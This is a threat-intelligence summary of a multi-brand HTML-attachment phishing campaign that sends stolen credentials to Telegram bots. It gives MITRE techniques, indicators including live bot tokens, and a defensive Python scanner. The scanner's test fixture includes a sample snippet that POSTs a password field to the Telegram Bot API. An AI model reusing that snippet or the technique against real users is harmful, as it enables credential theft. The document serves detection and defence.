Multi-Brand themed Phishing Campaign Harvests Credentials via Telegram Bot API

CRIL uncovered a widespread phishing campaign using self-contained HTML attachments that render fake Adobe-style login UIs and exfiltrate harvested credentials directly to attacker-controlled Telegram bots via the Bot API. The campaign reuses templates across multiple brands (Adobe, FedEx, WeTransfer, etc.), employs obfuscation and anti-analysis measures, and targets organizations primarily in Central and Eastern Europe. #Telegram #Adobe

Keypoints

  • Attackers distribute RFC-compliant HTML attachments (e.g., RFQ_4460-INQUIRY.HTML) that render a fake login modal and do not require external hosting.
  • Embedded JavaScript captures credentials from a simulated Adobe login form and posts them to the Telegram Bot API using hard-coded bot tokens and chat IDs.
  • Samples show technical sophistication: AES obfuscation, dual-capture forcing re-entry, IP/user-agent collection, Fetch API use, and anti-forensics blocking of developer tools and key combinations.
  • Multiple Telegram bots and tokens are actively used across samples (e.g., garclogtools_bot, v8one_bot) with evidence of infrastructure reuse across theme variants like FedEx and Adobe.
  • Campaign targets organizations across Central and Eastern Europe (Czech Republic, Slovakia, Hungary, Germany) and spans many industries including government, manufacturing, hospitality, and logistics.
  • Threat actors employ a modular template/toolkit enabling multi-brand impersonation (Adobe, Microsoft, WeTransfer, DocuSign, FedEx, DHL, Telekom) and multilingual lures.
  • Recommended defenses include blocking/sandboxing .html attachments, detecting api.telegram.org POSTs from clients, and adding content inspection for HTML attachments referencing Telegram or credential-capture code.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Malicious HTML attachments delivered via targeted emails (“delivered via targeted email attachments”).
  • [T1204.002] User Execution: Malicious File – Execution occurs when users open the HTML attachment in a browser or in a PDF viewer that renders HTML (“Execution occurs when the user opens or runs a malicious file disguised as legitimate software or documents.”).
  • [T1056.003] Input Capture via Web Form – The HTML page captures credentials entered into a simulated Adobe sign-in form and reads the field values via JavaScript (“Captures user credentials and other sensitive information entered in web forms.”).
  • [T1567.002] Exfiltration Over Web Service: Telegram API – Harvested credentials are sent via HTTP POST to https://api.telegram.org/bot<token>/sendMessage with chat_id and text fields (“Sends stolen data via Telegram API.”).
  • [T1027] Obfuscated/Encrypted File – Samples use AES encryption and other obfuscation to hide functionality and payloads (“Uses code obfuscation/encrypted files”).

Indicators of Compromise

  • [File names] Malicious HTML attachments – examples: RFQ_4460-INQUIRY.HTML, Quotation.html.
  • [Telegram bot tokens] Hard-coded exfiltration endpoints in JS – example pattern: 7447553175:AAF2ifSM0-b7OiF-E4ZzqeDVthDALq-IexQ, 8155473646:AAEZzrw4q_ZZws1J8mJOcqFix9bAnFYeFlo.
  • [API endpoints] Exfiltration and IP collection services – api.telegram.org/bot (exfiltration), api.ipify.org and http://ip-api.com (IP capture).
  • [UI artifacts] Embedded assets and form fields – blurred invoice background image and Adobe-themed modal with type="password" field (and other themed assets).
  • [YARA signature] Detection strings – includes api.telegram.org/bot, /sendMessage, type="password", and a regex for the bot token format (and other rule indicators).
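As an added example (not code from the Cyble write-up or its YARA rule), a Python scanner that applies the detection strings listed under the YARA indicators above and the content-inspection recommendation from the key points to the raw text of an HTML attachment, and pulls out the hard-coded bot token and chat_id for blocking. The bot-token regex and the sample HTML are constructed assumptions, not campaign artifacts.

```python
import re
from dataclasses import dataclass, field

# Indicator strings from the page's YARA signature (api.telegram.org/bot, /sendMessage,
# type="password") plus the IP-lookup services it names. The bot-token regex is an
# assumption about Telegram's token format: 8-12 digits, a colon, 35 token characters.
INDICATORS = {
    "telegram_api": re.compile(r"api\.telegram\.org/bot", re.I),
    "send_message": re.compile(r"/sendMessage\b", re.I),
    "bot_token": re.compile(r"(?<!\d)\d{8,12}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])"),
    "password_field": re.compile(r"""type\s*=\s*["']?password["']?""", re.I),
    "ip_lookup": re.compile(r"api\.ipify\.org|ip-api\.com", re.I),
}
CHAT_ID = re.compile(r"""chat_id["']?\s*[:=]\s*["']?(-?\d{5,})""", re.I)

@dataclass
class ScanResult:
    hits: list = field(default_factory=list)      # indicator names that matched
    tokens: list = field(default_factory=list)    # hard-coded bot tokens (block/report)
    chat_ids: list = field(default_factory=list)  # hard-coded chat IDs

    @property
    def verdict(self) -> str:
        exfil = "telegram_api" in self.hits or "bot_token" in self.hits
        if exfil and "password_field" in self.hits:
            return "malicious"   # login form wired to a Telegram bot
        if exfil:
            return "suspicious"  # Telegram Bot API reference in client-side code
        if "password_field" in self.hits:
            return "review"      # standalone login form, no exfil channel seen
        return "clean"

def scan_html(html: str) -> ScanResult:
    # Scan the raw attachment text; nothing is rendered, so nothing in it executes.
    result = ScanResult()
    result.hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    result.tokens = sorted(set(INDICATORS["bot_token"].findall(html)))
    result.chat_ids = sorted(set(CHAT_ID.findall(html)))
    return result

# Constructed samples, not real campaign artifacts: fake token and chat ID.
FAKE_TOKEN = "1234567890:" + "A" * 35
SAMPLE_PHISH = f"""<form><input type="password" id="pw"></form>
<script>fetch("https://api.telegram.org/bot{FAKE_TOKEN}/sendMessage",
  {{method:"POST",body:JSON.stringify({{chat_id:"987654321",text:pw.value}})}});</script>"""
SAMPLE_BENIGN = '<form action="/login"><input type="password" name="p"></form>'
```

Run `scan_html` over each extracted .html attachment at the mail gateway; a "malicious" verdict gives the token and chat_id to report to Telegram and to add to egress filtering.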


Read more: https://cyble.com/blog/multi-brand-phishing-campaign-harvests-credentials/